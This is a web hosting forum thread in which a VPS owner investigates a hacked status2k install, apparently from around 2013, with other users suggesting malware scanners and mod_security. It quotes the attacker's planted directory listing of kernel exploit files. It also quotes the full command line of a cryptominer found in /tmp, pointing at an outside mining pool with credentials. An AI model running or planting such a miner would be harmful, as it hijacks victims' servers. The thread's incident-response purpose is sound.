Results 1 to 6 of 6
  1. #1
    Join Date
    Feb 2005
    Location
    Norway
    Posts
    1,641

    Exclamation One of my sites hacked - not sure how (maybe status2k)

    Today I discovered that one of my subdomains on my own Vmware VPS was hacked. It's strange, since I only use that subdomain to host a status2k site, thats give information to my main status2k site.

    I have several VPS servers around the world, and everyone uses status2k, on their own subdomains.

    I have checked all my others sites, and only one site was hacked. My VPS is a VMware 10 virtual machine with CentOS 6.4, updated with all the latest updates.
    I'm using ConfigServer Security & Firewall - csf v6.36 with a IP allow list of only my home network, and some of my VPS servers.
    I'm using Virtualmin as control panel.

    The site that was hacked, did only have a status2k installation on it.
    The install directory was removed.
    I used a unique FTP password for the site (6 numbers, 5 letters and a underscore, so no easy password). And a long generated MySQL password.

    As far as I can see the only hack was that somebody has uploaded a index.html file on the site. I can not find any other changes.
    I have some other domains on the same server, and no other sites was affected. Some strange, since the subdomain is not the main site on my server.

    I have shutdown my server now, and will do a new CentOS installation on a new virtual machine. But I can't understand how somebody did hack my server. And why did they only hack a subdomain never used? Why did they not hack all the sites on my server?

    Can people hack status2k sites easily? I'm using their 3.1 version.

    any advice how to secure my other status2k sites more then I have today?

    Click image for larger version. 

Name:	301113hack1.jpg 
Views:	65 
Size:	72.2 KB 
ID:	26997

    Click image for larger version. 

Name:	301113hack2.jpg 
Views:	58 
Size:	141.9 KB 
ID:	26998

    And here is the index.html content

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <head>
    <title>Index of /02/sphider/admin/cgi/enlightenment</title>
    </head>
    <body>
    <h1>Index of /02/sphider/admin/cgi/enlightenment</h1>
    <table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr>
    <tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/02/sphider/admin/cgi/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_abacus.so">exp_abacus.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right"> 14K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_cheddarbay.so">exp_cheddarbay.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.6K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="exp_framework.h">exp_framework.h</a></td><td align="right">26-May-2013 09:17 </td><td align="right">4.8K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_ingom0wnar.so">exp_ingom0wnar.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">6.5K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_moosecox.so">exp_moosecox.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">7.9K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_paokara.so">exp_paokara.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.8K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_powerglove.so">exp_powerglove.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_sieve.so">exp_sieve.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">9.7K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_therebel.so">exp_therebel.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.3K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_vmware.so">exp_vmware.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">5.5K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exp_wunderbar.so">exp_wunderbar.so</a></td><td align="right">29-May-2013 03:17 </td><td align="right">6.1K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="exploit">exploit</a></td><td align="right">29-May-2013 03:17 </td><td align="right"> 40K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="funny.jpg">funny.jpg</a></td><td align="right">31-Mar-2009 19:50 </td><td align="right"> 66K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="run_nonnull_exploits.sh">run_nonnull_exploits.sh</a></td><td align="right">20-Sep-2009 18:23 </td><td align="right"> 42 </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="run_null_exploits.sh">run_null_exploits.sh</a></td><td align="right">25-May-2013 23:39 </td><td align="right">2.7K</td><td>&nbsp;</td></tr>
    <tr><th colspan="5"><hr></th></tr>
    </table>
    <address>Apache/2.2.16 (Debian) Server at utopia-doujinshi.info Port 80</address>
    </body></html>
    My Top 20 benchmark list (and review site)
    Powered by: Kimsufi, backed up by: Hetzner, DigitalOcean and Vultr.com
    Also using
    SolaDrive.com (45+ months), KnownHost.com (45+ months)

  2. #2
    Join Date
    Oct 2004
    Location
    Oakville, ON
    Posts
    239
    Hey Kenneth,

    I can't comment on how easily exploitable the status2k script is, a quick google search does show some exploits known about since 2010. What I can do however is offer some recommendations on how to check your server for the potential exploit area.

    One of the services I recommend to customers is "maldet" it will scan your website files and identify known signatures for exploitable code. This will give you an idea of how the exploit happened and what you may need to secure.

    You can learn more about maldet at: https://www.rfxn.com/projects/linux-malware-detect/

    Give that a try, full scan of the server (typically I would only do the web folders, but to insure your not rooted do a full scan first).
    Regards,
    Josh Dargie
    GreenGeeks.com
    Developer & Designer Friendly Web Hosting

  3. #3

  4. #4
    Join Date
    Feb 2005
    Location
    Norway
    Posts
    1,641
    Scanned my VPS with LMD now, and this is the result:

    malware detect scan report for vps44.xxxxxxxxxxx:
    SCAN ID: 120113-0020.3931
    TIME: Dec 1 00:21:05 +0100
    PATH: /home
    TOTAL FILES: 5436
    TOTAL HITS: 1
    TOTAL CLEANED: 0

    NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 120113-0020.3931
    FILE HIT LIST:
    {HEX}php.exe.globals.387 : /home/xx(not the domain that was hacked)xx/public_html/stats/webdesing.xxxxxxxxxxxx/Browsers.htm
    ===============================================
    Linux Malware Detect v1.4.2 < [email protected] >
    Since the only hit is a htm file in a directory on another domain on my server, is it possible that it's the reason for the hack? The two domains has nothing to do with another, and do not share the same domain at all. (the one hacked was a subdomain of domain1, the other domain with the hit is a domain2.com)
    My Top 20 benchmark list (and review site)
    Powered by: Kimsufi, backed up by: Hetzner, DigitalOcean and Vultr.com
    Also using
    SolaDrive.com (45+ months), KnownHost.com (45+ months)

  5. #5
    Join Date
    Oct 2004
    Location
    Oakville, ON
    Posts
    239
    Kenneth,

    It's very well possible, especially if they share the same cPanel account. Most hosting providers auto configure the cPanel on a VPS so theres already "cPanel to cPanel" attack protection. However the main thing most people forget is that multiple websites hosted inside one cPanel account are all accessible via the main FTP/cPanel login details. this will allow exploits to touch whatever it likes inside the cPanel account.

    My recommendation would be to do away with that file or what ever command is on line 387. From there, do a quick password update on the account and monitor for strange activity. The last recommendation I could offer is to insure your operating Mod_security. ConfigServe has a great management plugin for ease use (http://configserver.com/cp/cmc.html) and AtomiCorp offers some useful rules (both free but delayed, and paid rules) at https://www.atomicorp.com/products/modsecurity.html

    Having the Mod Security in place will watch for known exploit signatures and prevent them from executing. If something triggers that affects your primary website functions you can simply disable that individual rule but keep yourself for the most part protected.
    Last edited by Josh-D; 12-01-2013 at 01:19 PM. Reason: Additional tips
    Regards,
    Josh Dargie
    GreenGeeks.com
    Developer & Designer Friendly Web Hosting

  6. #6
    Join Date
    Feb 2005
    Location
    Norway
    Posts
    1,641
    Today I got a suspension on one of my VPS servers because of high CPU usage from a script.
    At almost the same time I saw my CPU usage going really high on one of my other VPS servers.

    I did find a script kalled "kpoll" running from my /tmp folder. The file was created from my status2k user 30/nov this year.

    The script was running this on my server:
    tmp/kpoll -B -q --url=stratum+tcp://ltc.give-me-coins.com:3333 -u unixminer.am -p fiLSs
    All of my sites using status2k had the same script in the /tmp folder, all of them was created 30/nov and all of them was created by the status2k user.

    There has to be a major security issue in status2k. I have now removed all status2k sites from all my servers, and removed the "kpoll" script from every server.
    I will never use status2k on any of my servers again, thats for sure.
    My Top 20 benchmark list (and review site)
    Powered by: Kimsufi, backed up by: Hetzner, DigitalOcean and Vultr.com
    Also using
    SolaDrive.com (45+ months), KnownHost.com (45+ months)

Similar Threads

  1. Replies: 12
    Last Post: 11-29-2011, 02:35 PM
  2. Hacked sites
    By Jon12345 in forum Hosting Security and Technology
    Replies: 9
    Last Post: 10-09-2011, 01:28 PM
  3. Sites getting hacked help!
    By klair_di_sardari in forum Hosting Security and Technology
    Replies: 3
    Last Post: 04-14-2010, 12:39 PM
  4. My RZ sites hacked!
    By lindmar in forum Reseller Hosting
    Replies: 16
    Last Post: 07-29-2006, 09:50 PM
  5. Sites Hacked
    By idolhost in forum Web Hosting
    Replies: 17
    Last Post: 07-27-2003, 05:35 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •